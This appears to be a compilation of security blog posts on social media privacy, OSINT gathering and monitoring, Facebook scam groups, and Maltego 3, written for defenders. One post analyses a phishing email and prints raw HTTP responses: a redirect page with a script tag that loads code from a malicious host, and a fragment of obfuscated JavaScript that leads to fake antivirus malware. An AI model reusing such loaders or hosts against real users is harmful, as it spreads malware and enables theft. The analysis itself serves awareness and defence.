Download the white paper.  Download Josh’s Metasploit modules.  Download Kevin’s vulnerable web services.

UPDATE (5/27): I found a very nice script by Patrick Toomey which can dump the contents of the keychain on Jailbroken iOS devices.  More details about how the script runs can be found in this blog post.  Note that the type of information you get back depends if the passcode is enabled or not.  You will get more keychain entries back if the passcode is not enabled.  I had mentioned in my presentation that I hadn’t found a script to do this yet…well here it is.

First is some research several of my colleagues and I worked on.  The paper is titled: “Profiling User Passwords on Social Networks”.  The paper discusses the password problem that we all know and love as well as how you can determine passwords by what individuals post on their profiles.  We dive into tools from Robin Wood, Mark Baggett and others that can be used to pull keywords from profiles and other sources to create wordlists.  These wordlists can be used for brute force attacks on user accounts.  Next, we look at password complexity of several popular social networks with some research around brute force controls that some of the social networks have implemented, or in some cases haven’t.  Lastly, we discuss some things that users of social networks can do when choosing passwords.  You can download my paper here.

The other paper released is titled: “Security Gaps in Social Media Websites for Children Open Door to Attackers Aiming To Prey On Children” by my colleague Scott White.  In his paper he looks at the security of social media websites specifically designed for children.  This is some very detailed research and sheds some light on how predators are using these sites to target children as well as some issues that are unique to these types of social media websites.  You can download Scott’s paper here.

Speaking of social media…I’ll be presenting “Social Impact: Risks and Rewards of Social Media” at the Information Security Summit this Friday at 10am.  I’ll have the slide deck posted shortly after the conference.

Setup and UI
The first thing you will notice is the startup wizard (Figure 1) that walks you though setting up your license and updating the TAS to download new transforms.  The wizard is a welcome addition especially for new users.

Figure 1. The Maltego 3 startup wizard.

You will notice that the transform manager itself has also gotten a face lift with a column showing you if a disclaimer is required or not (Figure 2).

Figure 2. The transform manager now shows you which transforms have a disclaimer or not.

Another noticeable change is the UI.  It’s sleek and sexy.  I also like how the main menu is grouped into two tabs: Investigate and Manage (Figures 3 and 4).  The Paterva team did a great job grouping items so its easy to select what you need.

Figure 3. Menu items are grouped into two tabs now.  Items are much easier to select.  This is the “Manage” tab.

Figure 4. The “Investigate” tab.

Back to the main UI.  Adding objects is similar to before but it’s faster and more responsive.  Figure 5 is a screen shot of the entire UI.

Figure 5. Simple Twitter search using the new Maltego 3 UI.

Entities connected to each other are easier to view.  When arrows connect to entities they move around other objects. (Figure 6).

Figure 6. Maltego 3 offers some nice UI improvements when moving entities around the screen.

Site Links and Entity Listings
Two other items I want to mention are some improvements on how links to and from a site are shown and the entity listing feature.  The site links transform rocks.  You can now see incoming and outgoing links to a website entity.

Figure 7. Links in and out of a website are easy to obtain in Maltego 3.

Lastly, I found the entity listing view most helpful.  This allows you to search and sort all the entities in your Maltego UI into a nice easy to view list (Figure 8).  Also, the dynamic view is pretty sweet as well.

Figure 8.  The entity list view provides a great way to search for things within the UI.

You can get the commercial version of Maltego now and the Community Edition is right around the corner.  Version 2 users can also use your same license key with Maltego 3.  Win!  Also, if your hesitant about buying a commercial product like this, don’t be.  Maltego is quite affordable for all the power you get and well worth it.  Reconnaissance is fun again!   More information about Maltego 3 is here.

The Email
The following screen shot shows you what the email looks like.  It seems to come from Twitter but you will notice that there are some interesting clues that tell you this isn’t real.  First, the Twitter account mentioned is just the first part of the email address this was sent to.  This may or may not be your Twitter ID.  Second, check out the “Britney Spears home video feedback” subject line and “Antidepressants for your bed vigor” bold red in the message body.  Yep.  All the signs that this isn’t from Twitter.  Ok, nothing to see here right?

The Link
When you look at the source of the email, the link actually goes to “hxxp://89.161.148.201/cekfcq.html”. If you do click on this link several things happen:

An HTML page is loaded which redirects you to a shady Russian software site.  This site (software-oemdigital.ru) has a ton of phisy looking domains that were assigned to it since 6/11/2010.  The HTML file also loads a script which runs a PHP file on another server.  Let’s take a look at the response:

HTTP/1.0 200 OK
Connection: close
Content-Length: 250
Content-Type: text/html
Date: Wed, 23 Jun 2010 15:09:53 GMT
Last-Modified: Wed, 23 Jun 2010 08:30:01 GMT
Server: IdeaWebServer/v0.70

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”>

<META HTTP-EQUIV=”refresh” CONTENT=”0;URL=hxxp://software-oemdigital.ru”>
<title></title>

<html><head>
</head></html><script src=hxxp://eurolisting.net/Cgi-bin/markprint.php ></script>

The Russian software site loads as normal but something else is going on in the background from eurolisting.net and that PHP file.  Here is the response:

HTTP/1.1 200 OK
Connection: close
Date: Wed, 23 Jun 2010 17:46:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1287414902; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/javascript

// <script>
function cxx(wcH){return wcH.replace(/%/g,”).replace(/['ow:Y]/g,fUp)}
cPH7j=’d:6fcY75meY6et.Y77rio74w65(Y22o3cdiv stylew3d:5cY22pw6fsitio6fnY3aaw62so6fl:75o74Y65o3b lefto3a:2d1000pxY3bw20tY6fp:3aw2d10w300pxw3bo5cw22:3ew22Y29w3b:66unctiY6fn :6973(a)o7bdY6fcu:6deY6et.w77rw69te(:22:3cifrao6d:65w20srcw3do5co22httw70Y3ao2f <SNIP>

All of the stuff following the script tag is obfuscated JavaScript.  I cut most of it out as it is quite lengthy.  Running this through jsunpack (a JavaScript unpacker) the script tries to load several things including some VBScript that seems to check for system properties, if you are running Firefox and if you have Java and/or Flash enabled as well as what seems to be a check for Adobe Reader plug-ins.  You can check out the script and the unpacked version over at the jsunpack site.

Now this is where it gets interesting.  In Internet Explorer the PHP file seems to generate a request to a URI that doesn’t exist: hxxp://89.161.148.201/zzz/ttt/ad3740b4.class, it 404′s.  You can also see this in the Wireshark capture below:

In Firefox it’s a different story.  The Russian software site still loads and something else attempts to get requested:

hxxp://wiki.insuranceplanningaz.com/main.php?h=89.161.148.201&i=JcmridQaq/ykgRj4UMpOy5Ec&e=4

This site will lead to some fun “fake AV” which prompts you to download a “setup.exe” file.

You probably don’t want to run that file.  The good news is that if you have the latest version of Firefox it will note this as a reported web forgery and tries to prevent you from going there.  One problem I see is that if you are running an older version of Firefox you might not get this notification.  I haven’t tested this with other browsers but your results may vary.

What does this all mean?  Well of course don’t click on shady emails like this.  You know better right?  Also, don’t think that because you use Firefox you are safe from attacks like these!  Attackers are catching on and I would suspect we will see more attacks targeting multiple browsers besides IE.  Wait, too late isn’t it?  Special thanks to Greg and Tyler for providing intel about these domains and some of the analysis.

In many companies the marketing, public relations, HR and other “business” functions really don’t want anything to do with security.  It’s true.  We always get in the way by stopping money making and/or great marketing ideas with phrases like “If you do that…the hax0rs are going to pwn us!” or “No you can’t, that’s against our security policy.  Go away now.”  Unfortunately, all it takes is one bad experience from the “security people” and they won’t want to work with you ever again.  I’ve seen it happen many times and I’ve even been “that evil security guy” at various times in my career.

It’s because of this bull headed attitude that these departments start finding ways around your policies, procedures, website blocking and more.  Why? Because security people are increasingly impossible to deal with.  Too much red tape, policies, rules and most of all…lack of communication.  That’s right, I said it.  Lack of good communication.  When was the last time you talked to these people in your company?  When was the last time you offered to help them with a compromise or solution rather then saying no?  This might be a shock to some of you but these are the people helping make the business money.  All of us in security are just an extra expense to the business.  Don’t make our jobs harder!  Here are three steps to help communicate to these people better:

1. Get out of your shell
We love to hang out and network at security conferences and user groups.  It makes sense because we are comfortable around our own people.  However, take a step back and think about what the “business needs” for a minute.  You are there to help the business succeed.  So go out and help them!  One way to do this is to attend a marketing conference.  Seriously.  You get to meet and talk to people that want to help the business make money and know how to do it.  You also get to learn what the business wants.  This will get you thinking about how you as the “security person” can help make that happen while keeping the business and its information safe.

2. Learn something new
What does marketing have to do with security?  All kinds of things!  SEO, blogging, social networking, social media, brand reputation, monitoring and more.  These are hot topics right now and there are serious security and privacy issues to be concidered.  You need to be involved!  The best way to do this is to attend their conferences, read their blogs and communicate.  One good way to get involved is to look for a local social media club in your area.  We have a great one in Cleveland and there are others in cities all over the US and probably the world.  Attend, learn and network.  It can only benefit you and your company.  Same goes if you are a consultant.  Meeting marketing people is a great way to get new business because they usually have a direct line to upper management at a company.  They will also be so impressed that a security person actually took the time to show up to a marketing conference…they might call upper management for you.

3. Teach and Educate
We have all “beaten the horse to death” regarding security awareness.  Many in security say it doesn’t work and is a hopeless battle.  While there is no patch for human stupidity, you still need to make an effort.  If anything, by you as the “security person” showing up at the marketing departments monthly meeting it shows that security wants to be involved with what they are doing.  This alone says volumes!  Especially to management of those groups.  Get out there and explain why you have certain policies, how the security team functions or better yet…how you can help them market the business and do it securely.

This update includes details on all the recent changes to Facebook’s privacy settings that went live May 26, 2010.  I have also included more information on “Instant Personalization”, removing yourself from “Platform”, and how your public information can be accessed via the Facebook Graph API.  Note that you may not have these settings enabled on your Facebook profile…yet.  They are slowly being rolled out to the Facebook user base and may take a few weeks.  Please share with friends, family and others!

Download the latest version of the Facebook Privacy & Security Guide here.

Jumping forward to today we see yet another iteration of these settings.  I don’t have the settings on my Facebook account yet so I haven’t updated the guide but I have read some of the information already out there.  The EFF has a good post up about the new settings.  They even have a YouTube video showing you the changes and their recommendations.  The other post you should read is one by theharmonyguy who, as always, has very good analysis of these settings and Facebook overall.

My thoughts are pretty much along the same lines as the EFF and others.  However, I will say that no matter what changes Facebook makes to their privacy settings they *will* find ways to use your information to make money.  This is Mark Zuckerberg’s business model and that won’t change anytime soon.  I will leave you with a fantastic quote that I think sums up all the media drama leading up to these new privacy controls.  This is a quote from Bruce Schneier.  It’s from an article he did for Forbes regarding statements that “Privacy is Dead”:

“It’s just not true. People, including the younger generation, still care about privacy. Yes, they’re far more public on the Internet than their parents: writing personal details on Facebook, posting embarrassing photos on Flickr and having intimate conversations on Twitter. But they take steps to protect their privacy and vociferously complain when they feel it violated. They’re not technically sophisticated about privacy and make mistakes all the time, but that’s mostly the fault of companies and Web sites that try to manipulate them for financial gain.”

Open Graph
The first significant change is Facebook’s “Open Graph”.  Open Graph is a significant departure from Facebook’s previous data connection strategy which used to be centered around Facebook Connect.  All of that is gone and replaced with Open Graph.  Open Graph basically allows partner websites and Facebook applications to share your public information and the public information of your friends with each other.  The other big change which is a departure from Facebook Connect is that developers can hold your data indefinitely.  The requirement was previously only for 24 hours (and we all know developers weren’t really holding to that anyway).

What’s also interesting is that Facebook has implemented an API called the Graph API. The Graphs API is how developers can easily integrate their applications with this new stream of user data.  In fact, now you don’t even need a Facebook account to search the Open Graph.  For example, https://graph.facebook.com/search?q=facebook&type=post will show you 25 recent status updates.  Note that these status updates are set to Everyone and it seems that Facebook has put a limit on data you can retrieve with one query (this will change most likely or you can figure out ways around this).  Before you had to log in to Facebook to do a search or use some creative Google queries for this information.  This is good news for attackers, spammers and data miners.  Facebook has made publicly available information even easier to search for and in my opinion, is going to start competing with Google for personalized search results.  Stay tuned, Open Graph is going to be a huge area that I will be focusing my research on.  As a penetration tester, my job just got easier.  Thanks Facebook!

Social Plugins
Social plugins are small bits of code (the “Like” button for example) that you probably have been seeing all over the web.  What Facebook has done is added simple plugins that web site developers can easily integrate.  Also note that there are many more plugins available besides the “Like” button.  Simply run the wizard, fill in a few lines and you’re done.  Lets take the “Like” button as an example.  If you are signed into Facebook (or not) you will see the button just like you do on Mashable:

Clicking on the button while you are signed in to Facebook posts a notice to your news feed that you like Mashable.  The button also works when you are not logged into Facebook by prompting you to sign in.  This is similar to how Facebook Connect worked.  If you want to “unlike” the page, simply click the “Like” button again.  Already, someone has found a potential security problem with the “Like” button that could possibly be abused by spammers.  Keep in mind that these social plugins are part of Facebook’s strategy to take over the world integrate their Open Graph protocol.  Once Open Graph starts to be more popular, you will see lots more attacks leveraging these new plugins.

Instant Personalization
Lastly, we have “Instant Personalization”.  Instant Personalization is the feature in which Facebook has “pre-approved” third-party web sites to gain access to your public information just by visiting them.  There is very little information available currently on how Facebook approves third-party sites.  Once you allow these sites full authorization, they have the same access that any developer would have to your Facebook information.  For example, here is what it looks like when you surf to Yelp.  You will get a pretty blue bar that shows up at the top of your browser window:

You should notice that you have the option to “Learn More” or say “No, thanks”.  You will also notice how instantly, if any of your friends on Facebook are using Yelp you can see any of their activity just below the blue bar.

Now something interesting happens once you visit one of these pre-approved sites.  I noticed that a Facebook application (in this case Yelp) gets installed and allows it permissions to post.  You don’t have to even click “No thanks”, the application is already installed.  Pandora and Microsoft Docs work the same way.  In fact, when testing the Microsoft Docs personalization I noticed the Facebook application that gets installed sets its privacy permissions to EVERYONE and allows one-line posts on your behalf.  This means that anyone can see any activity that is posted by that application.  Keep in mind that these controls are all being closely looked at by attackers and I suspect that we will see some hacks and/or abuse of this new personalization system soon.

Instant Personalization Privacy Settings
Facebook has put in a global “opt-out” check box in your privacy settings.  Of course in typical Facebook fashion they have buried this setting so it’s hard to find.  Ironically, just as I was writing this post Facebook changed the location of this setting.  So now you have to go down one more level by clicking an additional button to get to the setting (see the screen shot below).

There are some very important caveats about this setting.  First, this setting is enabled by default. Yes, that’s right.  If you have a Facebook account this setting is checked right now and you are opted in.  I had thought that Facebook would have learned from the Beacon fiasco but it appears they haven’t.  Secondly, just because you “opt-out” doesn’t mean your information is safe.  Just like other Facebook applications if your FRIENDS use Yelp, Pandora or Microsoft Docs these sites can still get your public information or anything else you have made available to be shared with friends.  To completely opt-out you need to MANUALLY block each and every application (in this case Yelp, Pandora and MS Docs).  It goes without saying, this is a huge pain and I look forward to the long list of complaints and privacy concerns regarding this psudo opt-out.  The other problem is that I have already seen posts by Facebook that they already have partner sites that they are going to announce soon.  What this means is that if you want to truly “opt-out” you need to keep up to date on all the new third-party partners with Facebook and manually block their applications.  This is a terrible control in my opinion.

So where are these settings?  Click on Account –> Privacy Settings –> Applications and Websites –> Instant Personalization (Click the Edit Settings button).  In the screen shot below you can see the box that you need to uncheck.

UPDATE: Yvan Boily on Twitter had mentioned that you should also uncheck every box under “What your Friends can share about you” in your privacy settings (in my guide on SocialMediaSecurity.com this is what I recommend as well).

I will be updating my Facebook Privacy & Security Guide over on SocialMediaSecurity.com to reflect all of these changes soon.  In the meantime, tell your friends on Facebook about these settings and check out a few other good articles on the recent changes.  Here are three articles I recommend reading: Pros and Cons of Today’s Facebook Announcements by theharmonyguy, How to Opt Out of Facebook’s Instant Personalization (with a nice video walk-through) by the EFF and Facebook Open Graph: What it Means for Privacy by Mashable.

Just like previous years, there are some really cool events you need to attend including Whose Slide is it Anyway, the Friday night experience and Blockparty!  This year the lock picking village is sponsored by Cleveland Locksport and be sure to check out Deviant Ollam’s new challenge the Defiant Box. Security Justice will also have a live show at 11pm Friday night in the Notacon Radio room. As for talks, this years lineup looks great!  Here are my picks of talks to attend this year:

Friday
Mick Douglas (from PaulDotCom Security Weekly) – U R Doin it Wrong Info Disclosure over P2P Networks
Tiffany Rad – Hacking Your Car: Reverse Engineering Protocols, Legalities and the Right to Repair Act
Brad Smith – Stealing from God!
Emily Schooley – Independent Filmmaking – Bringing Your Ideas from Paper to the Screen, and Everything in Between
Nicolle “rogueclown” Neulist – Hey, Don’t Call That Guy A Noob: Toward a More Welcoming Hacker Community
int eighty – Malicious PDF Analysis
catfood – Why Your Software Project Sucks (and how to make it not suck)
Dead Addict – Hidden Trust relationships, an exploration
Jeff “ghostnomad” Kirsch – The Haiku of Security: Complexity through Simplicity
David Kennedy (rel1k) – The Social-Engineering Toolkit (SET) – Putting cool back into SE

Saturday
Adrian Crenshaw (IronGeek) – Anti-forensics
James Arlen, Chris Clymer, Mick Douglas, and Brandon Knight – Social Engineering Security Into Your Business
James Arlen, Leigh Honeywell, Tiffany Rad and Jillian Loslo – Hacking The Future: Weaponizing the Next Generation
Melissa Barron – Hacking 73H 0r3g0n 7r41L for the Apple ][
Tom Eston, Chris Clymer, Matthew Neely, The Confused Greenies – Surviving the Zombie Apocalypse (did you see our preview?)
James Arlen – SCADA and ICS for Security Experts: How to avoid cyberdouchery
Eleanor Saitta – Designing the Future of Sex

Also on Saturday night don’t miss Dual Core at 8pm!  I’ll be around at the con hanging out so if you see me stop and say Hi.  See you there!

You can view the slides on my SlideShare page and the video is available on Vimeo.  In addition, Robin and I showed two demos during the talk.  First was my Facebook Application Autopwn with BeEF Demo and Robin’s new KreiosC2 demo using LinkedIn with Windows support.  Who knows, there might be more social zombies in the future!

There seems to be an interesting bug in the Facebook Application for BlackBerry in which a spammer can spoof the “facebookmail.com” domain to have SPAM messages show up in your notifications list within the BlackBerry Facebook application.  This only works if you have the Facebook for BlackBerry Application installed AND you have an email account configured on your BlackBerry (yes, this includes a corporate email account as well).  The email account you have configured on your BlackBerry is where you actually receive the SPAM message, not through Facebook.

The Facebook Application for BlackBerry appears to notify on any new email in one of your BlackBerry mailbox’s with “*.facebookmail.com” in the sender or return-path field.  This is a win for the spammer because now you think Facebook is spamming you and with the addition of an email, you’re more tempted to click on the link.  The Facebook Application for BlackBerry is no stranger to controversy and this particular bug has been noticed recently by others as well.  It also appears that this bug only affects the BlackBerry Facebook application.  When testing the iPhone app I couldn’t replicate the issue.

To test this bug I used EXIM4 in Ubuntu as a mail relay with mailtools to send the email.  This allowed me to send a spoofed email as “agent0x0@facebookmail.com” to one of the email accounts I have configured on my BlackBerry.  Here are screen shots of the spoofed email in my inbox and what it looks like in the Facebook Application for BlackBerry:

My opinion is that a mobile Facebook application should never be polling your personal email for these messages…but then again this could be a “feature” of this nicely designed application, right?   Special thanks to Kevin Johnson for helping with some of the research/testing.

The point is that these fake groups are targeting Facebook users thinking that Facebook has these new “features” like a dislike button and even ones like “see who viewed your profile”.  Folks, these techniques and/or modifications to Facebook don’t exist.  Sorry.  Just in the last week I have seen more and more of my Facebook friends sharing links to these groups.  Almost all of the groups I have looked at that were being shared lead to very bad places which I will demonstrate below.

Example #1 – The Typical “Get the DISLIKE BUTTON” Scam
In this example we have one of *many* groups that promise you the uber magic secret “dislike” button if you just join the group, invite your friends to do the same and follow some strange link off to Neverland.  This group has 1,162,238 members.  I wish I was making that number up.

The first thing you will notice is that there is a link to a Facebook profile they want you to friend.  That profile was deleted (your first clue).  Next, they want you to check out a link in Step 5.  That link sends you here:

Which will eventually install some nasty adware/spyware on your Windows machine called Adware.Mywebsearch.DV.  It’s not easy to get rid of.

In a similar group like the one above with a mere 697,375 members the last link takes you to this:

If you go through with entering in your cell phone number and getting the confirmation code per the instructions you have just signed up for a monthly charge to your cell phone account to the tune of $9.99 per month.  The monthly charge details is in the very tiny text you can hardly read.  Nice.  But wait, if you were smart enough to try and close the quiz window, you get this pop-up:

Really?  Hopefully you don’t fall for that one even though it shows your real city.

Example #2 – The Typical “See everyone who viewed your profile” Scam

This is one of my favorites as this is another impossible feat of Facebook technology.  Here is what the screen shot look like:

Note the PhotoShop job on the notification window showing who has “viewed” your profile.  Clicking on the bit.ly link leads you to another quiz application or adware/spyware or other forms of dangerous malware.  Don’t worry, there are *lots* of these groups out there. Good times.

So the lesson here is…don’t click on anything in these groups that tempt you with magical Facebook powers!  If it seems too good to be true, it probably is!

Regardless of settings I think that there are just *stupid* people using social networks.  In fact, I think that even if social networks didn’t exist these people would still be classified as ones with “no brain cells” (no pun intended with this example).  For example, here is tweet from a girl talking about a job interview she has scheduled with some company:

Now if that wasn’t bad enough…check out her profile picture:

I have nothing else to say but…FAIL.  Perhaps this is the start of a new series of blog posts. 

There are a great deal of articles already out about how this is such a great improvement and how these new settings give you more control over your privacy.  However, I would argue that these settings may possibly open up more issues then they are trying to prevent.  The best article on the new settings and the privacy implications is the one that the Electronic Frontier Foundation (EFF) released today titled: Facebook’s New Privacy Changes: The Good, The Bad, and The Ugly.  I recommend everyone (no pun intended) read this article as it provides much more detail then I will provide in this post.

What I want to do is provide you with a summary of the good and the bad of the new privacy settings.  I also want to give a security professional’s point of view on these settings.  As a penetration tester I can tell you that my job just got way easier!  You may have read my series on Enterprise Open Source Intelligence Gathering in which I tell you how you can find information on social networks about your company and employees.  Well, searching for information on Facebook just got easier thanks to status updates being available using new technology like Google Real-time Search!  Ok, on to the better and the worse!

The Better?

• The new way privacy settings are “managed” is a good thing.  It’s easier to find and navigate through the settings.
• I like that they ask you for your password to change privacy settings.  It’s just another layer.  Now, this doesn’t help much if you have a keylogger installed but it seems they put this in to prevent bots that may have taken over your account access to your settings.  Again, not fool proof but another layer.
• The ability to fully customize privacy settings on all the content you post.  So for example, you can specify if you want everyone on the Internet to view your status updates (more on that in a minute) or Friends, Friends of Friends and Custom.
• Users are now somewhat “forced” to check out their privacy settings.  It’s more accessible that’s for sure.

The Worse?

• Your Name, Profile Picture, Gender, Current City, Networks, Friend List, and Pages are all available to be viewed by EVERYONE on Facebook! You cannot change these settings at all.  Note, there is a way to remove your entire Friends List from your profile but it’s all or nothing!  Here is a screen shot of this. You have to set it in your profile page using the “edit” button and check the box.These changes are quite disturbing considering that you used to be able to restrict this type of information.  I really believe that Facebook has done this on purpose so *more* information is being shared about you while stating “enhanced” more granular privacy settings.  If you have been to one of my talks in the past I always mention that social networks need to find ways to make money.  The way they make money is off of the information you share!  If you don’t get a choice about the basic information anymore…that’s more money in their pocket at the expense of your privacy.
  
• What about the security ramifications of this? It opens up a whole new world for cyberstalking, predators and other attackers.  If you were someone that didn’t feel comfortable sharing this information in the first place, your choice is gone.  Sure, you can lock down your profile so no one can search for you but if you do that…why are you on Facebook to begin with?  You *have* to let your real friends search for you at some point!
• By default Facebook “suggests” that you set your status updates to “Everyone”.  Here is the thing with status updates….Everyone means everyone on the Internet!  This is where new technology like Google RTS comes into play.  Imagine how easy it will be to find the latest information on “Tiger Woods” or now everything YOU are saying on Facebook, Twitter and other social networks.  Enter in some social engineering and things just got easier for attackers looking to use you or your information (which is easy to figure out now that I can see your friends, and things that interest you via the pages your a fan of).
• Lastly, Facebook removed the ability to prevent Facebook applications your friends installed from pulling your “public” information.  That option is now gone and applications that your friends install can now view your “public” info.  Remember kids, “public” info is now: Your Name, Profile Picture, Gender, Current City, Networks, Friend List, and Pages.

One final note…be sure to double check all your privacy settings after you run the wizard.  I found a few settings that reverted back to settings I never had.  So what are your thoughts?  Will this make you lock your profile down more?  Do you care?  Is privacy dead anyway? Will Zombies destroy us all?

OSINT and Monitoring
After reading this series you are probably asking yourself…what do I do will all of these feeds and information that I have gathered?  Much of the information you have found about your company may be pretty overwhelming and you might find there is a ton of noise to filter through to get to the “good stuff”.  The next sections of this article will hopefully help you organize these feeds so you can begin a basic monitoring program.

What do you want to monitor?
This first thing you want to ask yourself…what do you want to monitor and what is most important?  You probably have noticed that it would be difficult to monitor the entire Internet so focus on what is relevant to your company or business.  Also, you want to pay particular attention to the areas of social media that your business has a presence on.  For example, if your business has a Facebook page, LinkedIn group and Twitter account you should be paying special attention to these first.  Why?  These are the sites that you have most likely allowed certain employees to use this form of media for business purposes.  Lastly, keep in mind that choosing what to monitor should be a group collaborative effort.  Get your marketing and public relations people involved in the decision making process.  As a bonus, it helps with making security everyone’s business.

Free tools to aggregate this information
Lets discuss briefly some tools to aggregate and monitor all the information sources you have decided as important.  There are two tools that I will talk about.  Yahoo! Pipes and RSS readers (specifically Google Reader).

1. Yahoo! Pipes
First, what is Yahoo! Pipes?  The best description is probably found on the Yahoo! Pipes main page:

“Pipes is a powerful composition tool to aggregate, manipulate, and mashup content from around the web.  Like Unix pipes, simple commands can be combined together to create output that meets your needs:

- combine many feeds into one, then sort, filter and translate it.
- geocode your favorite feeds and browse the items on an interactive map.
- grab the output of any Pipes as RSS, JSON, KML, and other formats.

The great thing about pipes is that there are already many different mashups that have already been created!  If you find one that doesn’t do what you like it to…you can simply copy a pipe, modify it and use it as your own.  Creating a pipe is really easy as well.  Yahoo! provides good documentation on their site even with video tutorials if you are lost.  Everything is done in a neat visual “drop-n-drag” GUI environment.  For example, you could take some of the sites that you find a bit more difficult to monitor, configure them in a pipe and send the output to RSS.  Once you have an RSS feed you can plug this into a RSS reader (like Google Reader) for monitoring.  Here are a few of my favorite pipes (pre-built) that can be used for monitoring:

Social Media Firehose
Social Media Monitoring Tool
Aggregate Social Media Feeds by User & Tag
Twitter Sniffer for Brands
Facebook Group RSS Feed, improved version here

2. Google Reader or your favorite RSS reader
The second part of your monitoring toolkit is to put your Yahoo! Pipe RSS feeds and the other feeds you determined as important and put them into the RSS reader of your choice.  I personally like Google Reader because it’s easy to use and manage.  However, you may prefer a desktop client or some other type of reader…all up to you.

What’s easy and works best?
First, assign someone to look at the information you are monitoring.  This should be someone in your information security department and someone with social media skill sets.  Next, create RSS Feeds from identified sites and utilize Yahoo! Pipes to customize and filter out content if you need to.  Finally, plug these feeds into your RSS reader and set up procedures for monitoring.  When will you check these feeds? What happens if the monitoring person is out?  Is there a backup for this person?  These are just a few of the things you need to think about when putting together these procedures.  There may be many more (or less) depending on your business.  Lastly, for sites you can’t monitor automatically determine manual methods and be sure to build procedures around them.

What is the company social media strategy? Do you even have one?
The first thing you need to do before you create policies or standards around what employees can or can’t do on social media/networking sites (related to your business), is to define a social media strategy.  Without a strategy defined it would be nearly impossible to determine a monitoring program without knowing what areas of social media your business is going to participate in.  This is a very important step and is something that your marketing/public relations/HR departments need to determine before security gets involved.

Internet postings or the “social media” policy
What if you have policies for Internet usage already in your company?  If you do, have you checked to see if they include specific things like social networks?  How about commenting on company news or issues on public social networks?  This is an area where many of the “standard” Infosec or HR policies don’t cover or don’t mention procedures about how employees use this new world of social media.  The other important part is that you need to partner with marketing/public relations/HR to collaborate on this policy.  The design and creation needs to have input from all of these areas of the business, especially these groups because they are going to be the main drivers for the use of social media.  Lastly, what is acceptable for employees to post?  Keep in mind that employees have Internet access *everywhere* nowadays.  iPhones, smartphones, Google phones…employees have these and guess what?  They are most likely using them at work.  How do you know that they are not commenting about company confidential business?  With this new generation of devices…the line between personal and company business will continue to blur. Oh, and this is just one simple example!

Examples of good policies to reference
So where do you go from here?  Create the policy!  The last part of this article has examples of good policies that you can reference when creating your own policies.  There is lots of good information in the following links and you can customize these for your own environment and business situation:

Cisco Internet Postings Policy
Intel Social Media Policy
4 Tips for Writing a Good Social Media Policy
10 Steps to Creating a Social Media Policy for your Company

Remember, monitoring the use of social media and creating policies around them is new and potentially uncharted territory for many organizations.  Hopefully with this series (and the related presentation) will help guide you and your organization to make the right decisions on finding information about your company, creating a monitoring program and working with your business partners to create the right policies for your business.

UPDATE: You can download my slide deck now on SlideShare.

Part one of the series discussed ways to gather OSINT on social networks and some of the challenges this creates.  Besides gathering OSINT on social networks there are many more sources of information that company information may be posted on.  These include blogs, message boards and document repositories.  One of the byproducts of finding documents is metadata, which I will explain in more detail below.

OSINT and Blogs
Blogs can be searched via any traditional search engine, however, the challenge with blogs are not necessarily the posts themselves but the comments.  When it comes to blog posts the comments are usually where the action is, especially when it comes to your current and former employees (even customers) commenting on highly sensitive pubic relations issues that a company might be conducting damage control over.  The other point to make about commenting is that employees might be posting things that be violating one of your policies and cause brand reputation problems.  Examples of this are all the countless leaks of profits, downsizing, confidential information and more that the news media reports on.  Wouldn’t be great to be monitoring blogs and their comments to find these things out before they go viral?

Listed below are some of the blog and comment search sites that I recommend you add to your monitoring arsenal which I will talk about creating in part three:

Social Mention http://socialmention.com (has *great* comment search and RSS for monitoring)
Google Blog Search http://blogsearch.google.com (great for creating RSS feeds and very customizable)
Blogpulse http://www.blogpulse.com/ (has comment search)
Technorati http://technorati.com/
IceRocket http://www.icerocket.com/
BackType http://www.backtype.com/ (has comment search)
coComment http://www.cocomment.com/ (has comment search)

OSINT and Message Boards
Message boards have always been a great source of OSINT.  Message boards date back before blogs were popular and are still widely used today.  Because there are so many message boards out there that could contain good OSINT you really need to use message board search engines unless you know about specific message boards that you know your employees use (or could).  Good examples of these are job related message boards like vault.com or Yahoo/Google Finance discussion forums or groups centered around stock trading.

Here is my list of message board search engines and a few that might be more specific for a company:

Google Groups http://groups.google.com/ (always a good choice for creating RSS feeds and very customizable)
Yahoo! Groups http://groups.yahoo.com/
Big Boards http://www.big-boards.com/ (huge list!)
BoardReader http://boardreader.com/ (very good search and RSS feeds of results)
Board Tracker http://boardtracker.com/ (very good search and RSS feeds of results)

More specific:
Craigslist Forums http://www.craigslist.org/about/sites (RSS available)
Vault www.vault.com (job/employee discussions)
Google Finance http://www.google.com/finance (search for company stock symbol and check out the discussions)
XSSed http://www.xssed.com/ (XSS security vulnerabilities)
Full Disclosure Mailing List http://seclists.org/fulldisclosure/ (Security vulnerability disclosure)

Document Repositories
Something that I have seen more of recently are sites called document repositories.  These sites either aggregate documents found from various sources on the Internet or people can upload their own documents and presentations for public sharing purposes.  These sites are probably my favorite since you will find all sorts of interesting information!  Here is my list of favorites:

Docstoc http://www.docstoc.com/
*Really good document search engine.  I wish there was better RSS for it but they have an API in which Yahoo! Pipes could probably be used.

Scribd http://www.scribd.com/ (RSS feed of results)
SlideShare http://www.slideshare.net/ (RSS feed of results)
PDF Search Engine http://www.pdf-search-engine.com/
Toodoc http://www.toodoc.com/

Great! You found documents.  Now what?
Once you find interesting documents be sure to check out the document metadata.  What is metadata? Metadata is simply “data about data”.  Metadata in documents is traditionally used for indexing files as well as finding out information about the document creator and what software was used to create the document.  It goes without saying that document metadata is a treasure trove of information that could be used against your company.  For example, vulnerable versions of software that can be used for client side attacks, OS versions, path disclosure, user id’s and more can all be viewed through document metadata.

There are lots of good tools to pull out metadata from documents and pictures. With some of these tools it’s even possible to write a script to automatically strip metadata from documents and pictures (start with the script Larry Pesce wrote in his SANS paper below).  However, the best method for removing metadata in my opinion is to make sure it’s removed (or limited) in the first place!  If you are creating a new document make sure you are removing it or not allowing the application to save some of the more revealing things like user id’s and OS/version numbers.  If you want more detail on metadata and how to use some of the tools that are available check out the great paper over at the SANS InfoSec Reading Room titled “Document Metadata, the Silent Killer created by Larry Pesce.  Here is a short list of tools I use (or have used) to analyze metadata:

EXIFtool http://www.sno.phy.queensu.ca/~phil/exiftool/ (my personal favorite! The swiss army knife of metadata tools)
Metagoofil http://www.edge-security.com/metagoofil.php
